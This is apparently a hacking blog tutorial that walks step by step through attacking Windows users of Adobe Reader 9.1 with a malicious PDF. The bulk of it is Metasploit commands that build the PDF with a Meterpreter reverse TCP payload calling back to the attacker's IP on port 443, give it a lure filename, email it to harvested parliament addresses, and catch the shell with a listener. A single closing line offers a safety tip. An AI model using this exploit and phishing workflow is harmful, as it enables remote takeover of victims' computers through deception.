Type : Tutorial
Level : Medium, Hard
Testing Platform : Win XP SP3, Windows 7
Vulnerable Application Testing : Adobe Reader 9.1
There are some people says that the weakest security to breach was the human itself. I didn’t say it was WRONG, because in fact yes it was the weakest, but I also cannot say TRUE, because sometimes the human didn’t know what they are doing because no one told them before .
In this tutorial I will give a demonstration how to attack client side using Adobe PDF Escape EXE vulnerability. Almost 95%(maybe) Windows users have Adobe Acrobat (Acrobat Reader) application in their computer or laptops.
If you watching or reading news a few weeks ago about Australia parliament computer has compromised by unknown hacker, actually the hacker do some social engineering technique to gain a privilege to Australian parliament computer and it was almost the same method use in this tutorial.
Okay, here’s the scenario of this attack method :
1. The parliament have an email address let’s says (firstname.lastname@example.org) — usually this type of people (maybe about 80%) only know how to use computer without knowing the risk about it… if there’s any problem, they will call IT support to fix the mess .
In this scenario, the attacker(Me) will attack using Computer Based Social Engineering. After a few times visiting facebook, Google, and also dumpster diving around the parliament office finally this attacker collecting a few parliament e-mail address lists.
2. Windows or Linux OS(I’m using Backtrack 5 in this tutorial)
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs --> Use adobe pdf embedded exe exploit set payload windows/meterpreter/reverse_tcp --> Set the payload to return meterpreter script when exploit successfully performed set filename Important_Meeting_Notice.pdf --> Make this file as interesting as you can so the victim will open your malicious PDF set lhost 192.168.8.92 --> Attacker IP address(change with your IP) set lport 443 --> I'm using this port to prevent victim proxy blocked the traffic(443 is always open :p ) exploit --> generate the malicious PDF
After we successfully generate the malicious PDF, it will stored on your local computer. I’ve highlight it using yellow marker, check the directory containing malicious PDF file.
2. The next step is sending our malicious code to target e-mail. In this case I will send it to email@example.com (see our scenario if you still asking why).
3. After sending our malicious PDF files, we need to set up a listener to capture this reverse connection. We will use msfconsole to set up our multi handler listener.
4. The victim(firstname.lastname@example.org) opened the e-mail and then scan using their antivirus.
Antivirus find nothing.
5. After the victim open our malicious PDF file there’s an alert box guide victim to tick the “do not show this message again” and click open.
6. After the victim click open button, our listener start capture reverse connection.
Yep we’re in!
- After successfully perform this attack, try to migrate process to Explorer.exe (see tutorial here on step 2 and 3).
1. When you open some files and there’s an aleart appears, read the alert carefully. Sometimes when you click “Next” or “OK” when alert appears is not a good idea
Hope you enjoyed it!